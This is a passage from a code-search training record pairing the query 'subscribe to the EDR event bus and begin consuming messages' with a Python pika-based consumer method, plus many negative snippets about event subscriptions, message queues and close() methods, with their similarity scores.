None:\n pass", "def close(self) -> None:\n pass", "def close(self) -> None:\n pass", "def close(self):\r\n pass", "def __exit__(self, exc_type, exc_val, exc_tb) -> None:\n for obj in self.__dict__.values():\n if hasattr(obj, 'close'):\n obj.close()", "def __del__(self) -> None:\n self.close()", "def _close( self ):\n for sji in self._sji_data:\n sji.close()", "def close(self):\n self._stream.close()\n self._arch.close()", "def close(self):\n self.closed = True\n for stream in self.streams:\n stream.close()", "def close(cls):\n pass", "def close_files(self):\n self.wb_alm.close()\n self.wb_defect.close()\n self.wb_enhancement.close()\n self.wb_incident.close()\n self.wb_destination.close()", "def close(self):\n return", "def close(self):\n return", "def close(self):\n return" ]
[ "0.8018784", "0.78392184", "0.77499765", "0.7615301", "0.7552293", "0.75487936", "0.7532097", "0.75203544", "0.7515063", "0.7499064", "0.7497777", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.7487781", "0.74826914", "0.74826914", "0.74812084", "0.74812084", "0.74812084", "0.74812084", "0.74812084", "0.74812084", "0.74812084", "0.74812084", "0.7454858", "0.7454858", "0.7454858", "0.7448511", "0.7437798", "0.7437798", "0.7435965", "0.7435965", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7412172", "0.7406675", "0.739233", "0.739233", "0.739233", "0.739233", "0.739233", "0.739233", "0.739233", "0.739233", "0.73736715", "0.7348615", "0.73434204", "0.7326901", "0.7319398", "0.73192334", "0.7309946", "0.7302832", "0.7302832", "0.72972506", "0.72972506", "0.7292621", "0.7292621", "0.7292621", "0.72878593", "0.72833186", "0.7273759", "0.7250635", "0.72452486", "0.72426236", "0.72410935", "0.72212607", "0.7199162", "0.7199162", "0.7199162" ]
0.0
-1
Subscribe to the EDR event bus and begin consuming messages
def consume_message_bus(self, test=False): if test: from test_fake_bus import FakeChannel, FakeConnection self.logger.info("Running Test Message Bus") self.channel = FakeChannel(self.on_bus_message, self.forwarder_options, self.logger) self.connection = FakeConnection() return username, password = self.get_bus_credentials() credentials = pika.PlainCredentials(username, password) parameters = pika.ConnectionParameters(self.cb_server_hostname, 5004, "/", credentials) self.connection = pika.SelectConnection(parameters, self.bus_on_connected, on_close_callback=self.bus_on_closed) self.logger.info("Starting bus connection") self.retry_attempts = 0 self.connection.ioloop.start()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def subscribe(receiver):", "def subscribe(receiver):", "def subscribe(receiver):", "def subscribe(self):\n if hasattr(self.bus, \"signal_handler\"):\n self.bus.signal_handler.subscribe()\n if hasattr(self.bus, \"console_control_handler\"):\n self.bus.console_control_handler.subscribe()", "def subscribe(self, event_handler):\n pass # pragma: no cover", "def subscribe(receiver, catchup):", "def subscribeConsumer(consumer):", "def subscribe(self) -> None:\n events = [\n HathorEvents.NETWORK_NEW_TX_ACCEPTED,\n HathorEvents.NETWORK_PEER_CONNECTING,\n HathorEvents.NETWORK_PEER_READY,\n HathorEvents.NETWORK_PEER_CONNECTED,\n HathorEvents.NETWORK_PEER_DISCONNECTED,\n HathorEvents.NETWORK_PEER_CONNECTION_FAILED\n ]\n\n for event in events:\n self.pubsub.subscribe(event, self.handle_publish)", "def enable_subscription():\n client = KConsumer(config=subscriber_config)\n counter = 0\n while 1:\n data = client.consume()\n if data:\n print(\"Received Data\", counter)\n class_label = inference_on_data(data.value)\n publish_response(class_label)", "def subscribeToEvent(eventName,subscriber,msgInterface):", "async def do_run(self, event_bus: EndpointAPI) -> None:\n ...", "def startListening(self):\n mgr = self.cxn.manager\n # example of Signal processing:\n # server = self.cxn[self.selectedADR]\n # update_state = lambda c, payload: self.updateInterface()\n # yield server.signal_state_changed(self.ID)\n # yield server.addListener(listener = update_state, source=None,ID=self.ID)\n\n # state update (only if the message is from the correct ADR server)\n update_state = lambda c, (s,payload): self.updateInterface() \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(update_state, source=mgr.ID, ID=101)\n yield mgr.subscribe_to_named_message('State Changed', 101, True)\n # log update\n update_log = lambda c, (s,(t,m,a)): self.updateLog(t,m,a) \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(update_log, source=mgr.ID, ID=102)\n yield mgr.subscribe_to_named_message('Log Changed', 102, True)\n # magging up stopped\n mag_stop = lambda c, (s,payload): self.magUpStopped() \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(mag_stop, source=mgr.ID, ID=103)\n yield mgr.subscribe_to_named_message('MagUp Stopped', 103, True)\n # regulation stopped\n reg_stop = lambda c, (s,payload): self.regulationStopped() \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(reg_stop, source=mgr.ID, ID=104)\n yield mgr.subscribe_to_named_message('Regulation Stopped', 104, True)\n # magging up started\n mag_start = lambda c, (s,payload): self.magUpStarted() \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(mag_start, source=mgr.ID, ID=105)\n yield mgr.subscribe_to_named_message('MagUp Started', 105, True)\n # regulation started\n reg_start = lambda c, (s,payload): self.regulationStarted() \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(reg_start, source=mgr.ID, ID=106)\n yield mgr.subscribe_to_named_message('Regulation Started', 106, True)\n # servers starting and stopping\n serv_conn_func = lambda c, (sID, sName): self.serverChanged(sName)\n serv_disconn_func = lambda c, (sID, sName): self.serverChanged(sName)\n self.cxn._cxn.addListener(serv_conn_func, source=mgr.ID, ID=107)\n self.cxn._cxn.addListener(serv_disconn_func, source=mgr.ID, ID=108)\n yield mgr.subscribe_to_named_message('Server Connect', 107, True)\n yield mgr.subscribe_to_named_message('Server Disconnect', 108, True)", "def process_amqp_events(self):\n self.connection.process_data_events()", "def subscribe(self, callback):\n self.channel.basic_consume(callback, queue=self.queue_name)\n self.channel.start_consuming()", "def _start_event_stream(self):\r\n\r\n # Register with an event queue, which will be used as event source:\r\n self._event_queue = self._call_factory(\"subscribe\")\r\n if self._event_queue is None:\r\n self.logger.debug(\"SseHTTPRequestHandler(Thread-%s): no queue, \"\r\n \"stopping this thread\",\r\n threading.current_thread().ident)\r\n # As per http://dev.w3.org/html5/eventsource/, a response code\r\n # of 204 tells the browser not to reconnect:\r\n self.send_response(204)\r\n return\r\n self.logger.debug(\"SseHTTPRequestHandler(Thread-%s): registered queue, \"\r\n \"start sending events\", threading.current_thread().ident)\r\n\r\n # Send HTTP headers:\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/event-stream\")\r\n self.end_headers()\r\n\r\n # Start event serving loop:\r\n self._send_events()", "def receive_incoming_messages_thread(self):\n\n def on_error(partition_context, error):\n logger.error(\"EventHub on_error: {}\".format(str(error) or type(error)))\n\n def on_partition_initialize(partition_context):\n logger.warning(\"EventHub on_partition_initialize\")\n\n def on_partition_close(partition_context, reason):\n logger.warning(\"EventHub on_partition_close: {}\".format(reason))\n\n def on_event(partition_context, event):\n reset_watchdog()\n if event:\n self.executor.submit(self.dispatch_incoming_message, event)\n\n logger.info(\"Starting EventHub receive\")\n with self.eventhub_consumer_client:\n self.eventhub_consumer_client.receive(\n on_event,\n on_error=on_error,\n on_partition_initialize=on_partition_initialize,\n on_partition_close=on_partition_close,\n max_wait_time=30,\n )", "def _event_subscribe(self) -> None:\n self.gateway.groups.subscribe(\n self.group_data_callback,\n event_filter=(EventType.ADDED, EventType.CHANGED),\n )", "def init_events_transmitter():\n class StatusListener(SubscribeCallback):\n def status(self, pubnub, status):\n event = \"unknown\"\n\n if status.operation == PNOperationType.PNSubscribeOperation \\\n and status.category == PNStatusCategory.PNConnectedCategory:\n event = \"Connect\"\n elif status.operation == PNOperationType.PNUnsubscribeOperation \\\n and status.category == PNStatusCategory.PNAcknowledgmentCategory:\n event = \"Unsubscribe\"\n\n asyncio.ensure_future(pubnub.publish().channel('status-' + APP_KEY).message({\n \"event\": event\n }).future(), loop=loop)\n\n def presence(self, pubnub, presence):\n pass\n\n def message(self, pubnub, message):\n pass\n\n listener = StatusListener()\n pubnub.add_listener(listener)", "def _on_connect(self, client, userdata, flags, rc):\n self.subscribe(self.topic)", "def on_subscribe(self, mqtt_client, userdata, mid, granted_qos):\n logging.debug(\"DEBUG - subscribe ack received\")", "def start(self):\n self.kb_client.subscribe(self.kb_ID, {\"_data\": {\"tag\": TAG_ANSWER, \"text\": \"$input\", \"timestamp\": \"$time\", \"language\": \"$lang\"}}, self.add_emotion) # from the 'gnlp' module", "def subscribe(self):\n with self._rabbit_connection.connection.channel() as channel:\n self._queue = rabbitpy.Queue(\n channel=channel,\n name=self._subscriber_name + \"_queue\",\n durable=True,\n message_ttl=5 * 24 * 60 * 60 * 1000 # 5 days\n )\n self._queue.declare()\n self._queue.bind(self._exchange, self._routing_key)\n\n self._consume()", "def subscribe(receiver, updateInterval=10):", "def listen(self):\n self.channel.start_consuming()", "def subscribe(self):\n if not self._subscribed and self._connected:\n if ATTR_STREAM_ID not in self.data:\n msg = self._create_message(strings.SUB_MSG)\n self.write(msg)\n else:\n msg = self._create_message(strings.RESUB_MSG)\n self.write(msg)\n self._subscribed = True", "def subscribe(receiver, updateInterval=None):", "def on_connect():\n print('Market Data Socket connected successfully!')\n\n # Subscribe to instruments\n print('Sending subscription request for Instruments - \\n' + str(Instruments))\n response = xt.send_subscription(Instruments, 1501)\n print('Sent Subscription request!')\n print(\"Subscription response: \", response)", "def start_consuming(self):\n logger.info('Issuing consumer related RPC commands')\n self.add_on_cancel_callback()\n logger.info(\"[{}] Waiting for messages on exchange {}\".format(self.bot_id, self.exchange))\n self._consumer_tag = self._channel.basic_consume(self.on_message,\n self.queue_name)", "def subscribe(self, topic):\n self.topic = topic\n self.client.on_connect = self.on_connect\n self.client.on_message = self.on_message\n\n self.client.loop_start()", "def event_publish(self, cmd):\n for sub in self.subscribers:\n sub.event_receive(cmd)", "def listen(self):\n self._client.listen(self._default_subscribe_to_dest)", "def run(self):\n print('starting up on {} port {}'.format(*self.listener_address))\n self.selector.register(self.listener, selectors.EVENT_READ)\n\n # Serialize our listener's host and port\n serializedAdd = fxp_bytes_subscriber.serialize_address(\n self.listener_address[0], self.listener_address[1])\n\n # Contact with Publisher\n self.listener.sendto(serializedAdd, self.gcd_address)\n\n while True:\n events = self.selector.select(CHECK_INTERVAL)\n for key, mask in events:\n data = self.receive_message()\n self.removeOldQuote()\n self.createGraph(data)\n self.arbitrage()\n self.checkTimeout()", "def read(self):\n log.info(\"==>\")\n # TODO exceptions\n assert self.subscription_list is not None\n if not self.is_once():\n assert self.read_queue is not None\n event = None\n first_sample = True\n while True:\n log.debug(\"Processing event type %s\", event)\n # SAMPLE is handled in the same way as \"first_sample\"\n if first_sample or event == self.SubscriptionEvent.SAMPLE:\n response = self.sample(\n start_monitoring=self.is_monitor_changes() and first_sample)\n yield response\n if first_sample:\n yield self.sync_response()\n first_sample = False\n if self.is_once():\n break\n elif event == self.SubscriptionEvent.FINISH:\n log.debug(\"finishing subscription read\")\n break\n elif event == self.SubscriptionEvent.SEND_CHANGES:\n response = self.changes()\n log.debug(\"Sending changes\")\n yield from response\n elif event is None:\n log.warning(\"**** event is None ! ****\")\n # TODO error\n break\n else:\n log.warning(\"**** event=%s not processed ! ****\", event)\n # TODO error\n break\n log.debug(\"Waiting for event\")\n event = self.read_queue.get()\n log.debug(\"Woke up event=%s\", event)\n if self.is_monitor_changes():\n self.stop_monitoring()\n\n log.info(\"<==\")", "def _subscribe_to_peers(self):\n if not self.config['PEERS']:\n return\n context = zmq.Context()\n socket = context.socket(zmq.SUB)\n socket.setsockopt(zmq.SUBSCRIBE, '')\n\n for ip, pub_port, api_port in self.config['PEERS']:\n if not self._is_self(ip, pub_port):\n address = '%s:%s' % (ip, pub_port)\n self.logger.debug('Subscribing to peer at: %s' % address)\n socket.connect('tcp://%s' % address)\n\n def new_msg_handler(sender, msg=None):\n topic, delimiter, packed = msg.partition(' ')\n topic = int(topic)\n message_dict = msgpack.unpackb(packed)\n #self.logger.debug('News for topic %s:%s arrived' %\n # (topic, constants.topics.get(topic)))\n self._handle_topic(topic, message_dict)\n\n sig = signal(constants.NEW_MESSAGE_TOPIC)\n sig.connect(new_msg_handler, weak=False)\n\n while True:\n msg = socket.recv()\n sig.send(self, msg=msg)\n gevent.sleep(.1)", "def event_in_cb(self, msg):\n self.event = msg.data", "def event_stream(self):\n for message in self.subscribe():\n event = message_to_sse(message[\"data\"])\n yield event", "async def cb_nr_subscription_handler(msg: nats.aio.client.Msg):\n try:\n logger.info('Received raw message seq:%s, data= %s', msg.sequence, msg.data.decode())\n event_message = json.loads(msg.data.decode('utf-8'))\n logger.debug('Event Message Received: %s', event_message)\n await process_event(event_message, FLASK_APP)\n except Exception: # noqa pylint: disable=broad-except\n # Catch Exception so that any error is still caught and the message is removed from the queue\n logger.error('Queue Error: %s', json.dumps(event_message), exc_info=True)", "async def consume(\n self,\n listen_for: List[Tuple[str, str]],\n listener_name: str,\n bus_client: \"BusClient\",\n **kwargs,\n ) -> AsyncGenerator[List[EventMessage], None]:\n raise NotImplementedError(\n f\"Event transport {self.__class__.__name__} does not support listening for events\"\n )", "def handleMessage_started(self, message):\n self.eventbus.publish(MarathonStartedEvent())", "def test_dispatch_event(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [])\n msg = msg_helper.make_ack()\n yield worker_helper.dispatch_event(msg, 'fooconn')\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [msg])", "def start(self):\n if self._chan is not None:\n try:\n self._chan.start_consume()\n except ChannelError:\n log.info('Subscriber is already started')\n\n else:\n self.gl = spawn(self.listen)", "async def next_event(self):\n if not self._open:\n raise WebsocketClosedError(1006, reason=\"Connection lost\")\n\n try:\n event = await self.websocket.poll()\n except WebsocketClosedError:\n # Close ourselves.\n await self._close()\n raise\n\n if isinstance(event, (bytes, bytearray)):\n # decompress the message\n event = zlib.decompress(event, 15, 10490000)\n event = event.decode(\"utf-8\")\n\n if event is None:\n return\n\n event = json.loads(event)\n\n op = event.get(\"op\")\n data = event.get(\"d\")\n seq = event.get(\"seq\")\n\n # Heartbeat logic, same as normal websocket\n if seq is not None:\n self.sequence = int(seq)\n\n # Switch based on operator.\n if op == VGatewayOp.HELLO:\n # Ignore these, they're useless for now.\n return\n\n elif op == VGatewayOp.READY:\n # Start heartbeating.\n heartbeat_interval = data.get(\"heartbeat_interval\", 45000) / 1000.0\n logger.debug(\"Heartbeating every {} seconds.\".format(heartbeat_interval))\n self._start_heartbeating(heartbeat_interval)\n # Set our `ssrc`, `port` and `modes`.\n self.ssrc = data.get(\"ssrc\")\n self.port = data.get(\"port\")\n\n await self._ready.set()\n\n elif op == VGatewayOp.SESSION_DESCRIPTION:\n # Extract the secret key.\n self.secret_key = data.get('secret_key')\n self.send_speaking()\n await self._got_secret_key.set()\n\n elif op == VGatewayOp.HEARTBEAT:\n # silence\n pass\n\n elif op == VGatewayOp.HEARTBEAT_ACK:\n # suppress\n pass\n\n else:\n logger.warning(\"Unhandled event: {}\".format(op))", "def run(self):\n self.logger.info(\"starting Dashi consumer\")\n while not self.shutdown:\n self.rpc.listen()", "def _begin_consuming(self):\n self._consuming = True\n loop = asyncio.get_event_loop()\n self._message_queue = asyncio.Queue(\n maxsize=self.app.settings['SQS_PREFETCH_LIMIT'],\n loop=loop,\n )\n loop.create_task(self._consume())", "def eventmonitorloop(self):\n if self.service is None:\n return\n logger.info(\"Subscribing to EMANE location events (not generating them). \" \\\n \"(%s) \" % threading.currentThread().getName())\n while self.doeventloop is True:\n if emane.VERSION >= emane.EMANE091:\n uuid, seq, events = self.service.nextEvent()\n if not self.doeventloop:\n break # this occurs with 0.9.1 event service\n for event in events:\n (nem, eid, data) = event\n if eid == LocationEvent.IDENTIFIER:\n self.handlelocationevent2(nem, eid, data)\n else:\n (event, platform, nem, cmp, data) = self.service.nextEvent()\n if event == emaneeventlocation.EVENT_ID:\n self.handlelocationevent(event, platform, nem, cmp, data)\n logger.info(\"Unsubscribing from EMANE location events. (%s) \" % threading.currentThread().getName())", "def subscribe_to_commands(self):\n self.basic_consume(self.process_command, queue=self.name)", "def test_connect_subscriber():\n config = {\"listeners\": \"localhost:8080\"}\n registry = Registry()\n registry.new(name=\"test\", backend=\"dummy\", **config)\n\n dummy = registry[\"test\"]\n subscriber = dummy.subscribe([\"mytopic\"])\n message = subscriber.listen()\n\n assert message == \"Dummy Message\"\n subscriber._connect.assert_called_once()", "def run(config, logging, inq, subscribe_callback, unsubscribe_callback):", "def put_event(self, event):\n log.info(\"==> event=%s\", event)\n assert self.subscription_list is not None\n assert self.read_queue is not None\n self.read_queue.put(event)\n log.info(\"<== \")", "def start(self) -> None:\n conn_manager = ConnectionManager(broker_host=self.broker_host, queue=self.queue)\n channel = conn_manager.start_channel()\n channel.basic_consume(queue=self.queue, on_message_callback=self.callback)\n\n try:\n print(\"PV Simulator...\")\n channel.start_consuming()\n except KeyboardInterrupt:\n pass", "def processEvent(self):\n # Note: break out of event dispatch loop when closedown event is received\n # and closing flag is set. This is to prevent DoS attack by faked closedown\n # event type, and to ensure that prior events received are all processed.\n delay_on_error_min = 0.125 # Back off retry interval on error..\n delay_on_error_max = 20.0 # ..\n delay_on_error = delay_on_error_min # ..\n while True:\n if delay_on_error < delay_on_error_max:\n delay_on_error *= 2\n try:\n # PLEASE NOTE: In the event that the HTTPC is run as duplex, not simplex\n # then the post methods will be delayed if nothing is sent down to the client\n # from the server. This timeout is controlled by QUEUE_WAIT_TIMEOUT in EventRouterHTTPS.py\n if self._simplex == True:\n self._queueEvent.wait()\n self._queueEvent.clear()\n \n if not self._queue.empty():\n Trace(\"%s queue.get ...\"%(self.getUri()), \"EventLib.EventRelayHTTPC\")\n ###msgbody = self._queue.get()\n ###Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n ###self._event.set()\n msgbody = self.getQueuedItem()\n [typ,env] = msgbody\n if typ == \"closedown\":\n if self._closing: break\n else:\n # process request as an HTTP POST request\n data = makeEnvelopeData(env)\n headers = { \"Content-type\": \"text/plain\",\n \"Accept\": \"text/plain\",\n \"Content-length\": str(len(data)) }\n self._httpcon.request(\"POST\", \"/request_path_ignored\", data, headers)\n response = self._httpcon.getresponse()\n delay_on_error = delay_on_error_min\n elif self._simplex == False:\n # Nothing in queue:\n # issue a GET for incoming events\n _log.info(\"%s HTTP get ...\"%(self.getUri()))\n headers = { \"Accept\": \"text/plain\" }\n self._httpcon.request(\"GET\", \"/request_path_ignored\", None, headers)\n response = self._httpcon.getresponse()\n if response.status == 200:\n delay_on_error = delay_on_error_min\n msgbody = response.read()\n Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n # Parse message and act accordingly\n msgdata = parseMessageData(msgbody)\n Trace(\"%s get msgdata: %s\"%(self.getUri(),str(msgdata)), \"EventLib.EventRelayHTTPC\")\n if msgdata == None:\n #TODO: Log \"Request body malformed\"\n pass\n elif msgdata[0] == \"forward\":\n # msgdata = [\"forward\", [['R1', 'R2', 'R3'], 'ev:typ', 'ev:src', 'payload']]\n event = makeEvent(evtype=msgdata[1][1],source=msgdata[1][2],payload=msgdata[1][3])\n env = constructEnvelope(msgdata[1][0], event)\n self.forward(event, env)\n elif msgdata[0] == \"idle\":\n # Idle response gives client a chance to send if anything is queued\n pass\n else:\n #TODO: handle closedown message?\n Warn( \"%s Request body unrecognized option: %s\"%(self.getUri(),msgdata[0]), \"EventRelayHTTPC\")\n pass\n elif response.status == 503:\n Trace( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n # Remote end closed down\n break\n else:\n # TODO: (log error response)\n Warn( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n \n except httplib.BadStatusLine, e:\n # This can happen at closedown\n Info( \"%s processEvent bad response: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.CannotSendRequest, e:\n # This can happen at closedown\n Info( \"%s Cannot send request: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.ResponseNotReady, e:\n # This can happen at startup and sometimes other times:\n # maybe multiple requests on a single HTTP connection object?\n Info( \"%s Response not ready: (%s)\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except socket.error, e:\n Warn( \"%s Socket error: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n return", "def StartSubscriptions(self):\n rospy.Subscriber('/drivers/dvl', Dvl, self.dvl_callback)\n rospy.Subscriber('/drivers/imu', Imu, self.imu_callback)\n rospy.Subscriber('/reference/depth', Position, self.refDepth_callback)\n rospy.Subscriber('/reference/speed', Speed, self.refSpeed_callback)\n rospy.Subscriber('/reference/rpy', Euler, self.refRpy_callback)\n rospy.Subscriber('/reference/ll', Position, self.refLL_callback)\n rospy.Subscriber('/control/trackers_enabled', Trackers, self.trackersControl_callback)", "def processEvents(self):\n if not self.getIsConnected():\n return\n\n # Loop until there is no more data in the receive buffer.\n while True:\n if not self._socketPoller.isReady():\n # There is no data waiting.\n return\n\n nBytesRead, _ = self._socket.recvfrom_into(self._buffer)\n if nBytesRead <= 0:\n # Since we checked for data ready, we don't expect this.\n return\n\n # _bufferView is a memoryview, so we can slice efficienty.\n self._elementReader.onReceivedData(self._bufferView[0:nBytesRead])", "def eventInCallback(self, msg):\n rospy.loginfo(\"event_in msg received\")\n self.event_in = msg.data", "def _eventloop(self):\n logging.debug(\"%s - eventloop started\" % self.name)\n while not self.stopped:\n event = self.inqueue.get()\n if not event: break\n self.doevent(event)\n logging.debug(\"%s - eventloop stopped\" % self.name)", "def on_connected(self):\n logger.info('connection to redis resumed')\n for chid in self.clients.iterkeys():\n self.subscriber.psubscribe(chid)", "def starup(self, sender, **kwargs):\n self._initialize_devices()\n for device_topic in device_topic_dict:\n _log.debug('Subscribing to ' + device_topic)\n self.vip.pubsub.subscribe(peer='pubsub',\n prefix=device_topic,\n callback=self.on_analysis_message)", "def mqtt_sub():\n global args\n args = parse_args()\n init(args)\n mqtt_connection = setup_connection(args)\n\n connect_future = mqtt_connection.connect()\n # Future.result() waits until a result is available\n connect_future.result()\n print(\"Connected!\")\n\n # Subscribe\n print(f\"Subscribing to topic '{args.subscribe_topic}'...\")\n subscribe_future, packet_id = mqtt_connection.subscribe(\n topic=args.subscribe_topic,\n qos=mqtt.QoS.AT_LEAST_ONCE,\n callback=on_message_received,\n )\n\n subscribe_result = subscribe_future.result()\n print(\"Subscribed with {}\".format(str(subscribe_result[\"qos\"])))\n\n # Wait for all messages to be received.\n # This waits forever if count was set to 0.\n if args.count != 0 and not received_all_event.is_set():\n print(\"Waiting for all messages to be received...\")\n\n received_all_event.wait()\n print(f\"{received_count} message(s) received.\")\n\n # Disconnect\n print(\"Disconnecting...\")\n disconnect_future = mqtt_connection.disconnect()\n disconnect_future.result()\n print(\"Disconnected!\")", "def subscribe(self):\n pubsub = self.redis_client.pubsub()\n pubsub.subscribe(self.message_channel)\n for item in pubsub.listen():\n if item.get(\"data\") not in (1, None):\n yield item", "def attach_message_bus(self):\n print(\"Connecting to Mycroft message bus\")\n self.client = MessageBusClient()\n print(\"Calling client.run_in_thread()\")\n try:\n self.client.run_in_thread()\n except Exception as e:\n print(\"ERROR: run_in_thread() failed - is Mycroft running?\")\n sys.exit(1)", "def do_start(self):\n threading.Thread(group = None, \n target = self._subscribe_message, name = \"RabbitMQSubscribeThread\") .start()\n threading.Thread(group = None, \n target = self._publish_message, name = \"RabbitMQPublishThread\").start()", "def consumeMsg():\n\tosuser = 'osdev'\n\tospass = 'osdev'\n\toshost = '10.32.29.94'\n\tosport = '5672'\n\tosvhost = '/openstack'\n\tneutronExchange = Exchange('quantum', type='topic', durable=False)\n\tinfoQueue = Queue('exthook', exchange=neutronExchange , durable=False,\n\t\t\trouting_key='notifications.info')\n\twith Connection(\"\".join(['amqp://', osuser, ':', ospass, '@', \n\t\toshost, ':',osport, '/', osvhost])) as conn:\n\t\twith conn.Consumer(infoQueue, callbacks=[msgParse]):\n\t\t\twhile True:\n\t\t\t\ttry: \n\t\t\t\t\tconn.drain_events()\n\t\t\t\texcept Exception, e:\n\t\t\t\t\tlogging.exception('Draining events from AMQP stop')\n\t\t\t\t\tbreak", "def _listen(self, uuid=None, session=None):\n if session:\n from .nurest_session import _NURESTSessionCurrentContext\n _NURESTSessionCurrentContext.session = session\n\n if self.url is None:\n raise Exception(\"NURESTPushCenter needs to have a valid URL. please use setURL: before starting it.\")\n\n events_url = \"%s/events\" % self.url\n if uuid:\n events_url = \"%s?uuid=%s\" % (events_url, uuid)\n\n request = NURESTRequest(method='GET', url=events_url)\n\n # Force async to False so the push center will have only 1 thread running\n connection = NURESTConnection(request=request, async=True, callback=self._did_receive_event, root_object=self._root_object)\n\n if self._timeout:\n if int(time()) - self._start_time >= self._timeout:\n pushcenter_logger.debug(\"[NURESTPushCenter] Timeout (timeout=%ss).\" % self._timeout)\n return\n\n else:\n connection.timeout = self._timeout\n\n pushcenter_logger.info('Bambou Sending >>>>>>\\n%s %s' % (request.method, request.url))\n\n #connection.ignore_request_idle = True\n connection.start()", "def subscribe(self, channel, **kwargs):\n pass", "def _send_events(self):\r\n _message_number = 0\r\n _stop = False\r\n while not _stop:\r\n _message_number += 1\r\n try:\r\n _message_contents = self._event_queue.get()\r\n if self._check_message(_message_contents):\r\n self._send_message(_message_contents, _message_number)\r\n if _message_contents[\"event\"] == \"terminate\":\r\n _stop = True\r\n except IOError as ex:\r\n if ex.errno == 10053 or ex.errno == 10054 or ex.errno == 32:\r\n self.logger.info(\"_SseSender(Thread-{0}): \"\r\n \"client closed connection.\".format(\r\n threading.current_thread().ident))\r\n _stop = True\r\n else:\r\n self.logger.warning(\"_SseSender(Thread-{0}): \"\r\n \"I/O error({1}): \"\r\n \"{2}\".format(threading.current_thread().ident,\r\n ex.errno, ex.strerror))\r\n except:\r\n self.logger.error(\"_SseSender(Thread-{0}): Unexpected error: \"\r\n \"{1}\".format(threading.current_thread().ident,\r\n sys.exc_info()[0]))\r\n self.logger.info(\"_SseSender(Thread-{0}): stopping _send_events \"\r\n \"loop.\".format(threading.current_thread().ident))\r\n self._call_factory(\"unsubscribe\")", "def test_subscribe_any_listener(self):\n with self.assertRaises(AssertionError):\n EVENT_MANAGER.subscribe('test_any_listener')", "def listen(self):\n result = self.channel.queue_declare(queue=self.config['queue'], \n exclusive=True)\n if self.endpoints is not None:\n for key in self.endpoints:\n self.channel.queue_bind(exchange=self.config['exchange'], \n queue=self.config['queue'],\n routing_key=f\"sensor_value.{key}\")\n else:\n self.channel.queue_bind(exchange=self.config['exchange'],\n queue=self.config['queue'],\n routing_key=\"sensor_value.#\")\n \n self.channel.basic_consume(queue=self.config['queue'], \n on_message_callback=self.decode_values, \n auto_ack=True)\n\n # starts a while-type loop\n print(\"wabbit eatin hay\")\n self.channel.start_consuming()", "def subscribe(self, subject):\n pass", "def subscribe(self, service_name, event_name, callback):\n msg = SubscribeMessage(service_name=service_name, event_name=event_name)\n self.send_message_blocking(msg)\n\n # if subscribe failed an exception should be raised by now\n self._event_callbacks[(service_name, event_name)] = callback", "def start_consuming(self, channel, rx_queue_name):\n if self.should_stop():\n logger.info(\"ready to stop, pause to consume\")\n return\n logger.info('Issuing consumer related RPC commands')\n self._consumer_tag = channel.basic_consume(\n self.on_message, rx_queue_name, auto_ack = False)\n channel.start_consuming()", "def start_consuming(self):\n self.logger.debug(\"Issuing consumer related RPC commands\")\n\n self._channel.basic_qos(prefetch_count=self._max_concurrent)\n self._channel.add_on_cancel_callback(self.on_consumer_cancelled)\n\n consume_kwargs = {\"queue\": self._queue_name}\n if PIKA_ONE:\n consume_kwargs[\"on_message_callback\"] = self.on_message\n else:\n consume_kwargs[\"consumer_callback\"] = self.on_message\n\n self._consumer_tag = self._channel.basic_consume(**consume_kwargs)", "def subscribe(self):\n fd = libplasma.subscribe(self.conn)\n self.notification_sock = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)\n # Make the socket non-blocking.\n self.notification_sock.setblocking(0)", "def subscribe(self, transport, data):\r\n\r\n self.add(transport, address=data.get('hx_subscribe'))\r\n\r\n self.send(\r\n data.get('hx_subscribe'),\r\n {'message': \"%r is listening\" % transport}\r\n )", "def subscribe2API():\n\tconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\n\tchannel = connection.channel()\n\n\tchannel.queue_declare(queue='ToAPIgatewayQueue')\n\n\tdef callback(ch, method, properties, body):\n\t\tif(body != ''):\t\n\t\t\tconnection.close()\n \t\tpublish2apiHandler(body)\n\t\t\t\n\t\t\t\n\t\t\t\n\tchannel.basic_consume(callback, queue='ToAPIgatewayQueue', no_ack=True)\n\n\tprint(' [*] Waiting for messages. To exit press CTRL+C')\n\tchannel.start_consuming()\n\t\n\treturn", "def _on_received(self):\n self._call_subscribers(on_level=0xFF)\n publish_topic(self._on_subscriber_topic, on_level=0xFF)", "def _on_received(self):\n self._call_subscribers(on_level=0xFF)\n publish_topic(self._on_subscriber_topic, on_level=0xFF)", "def 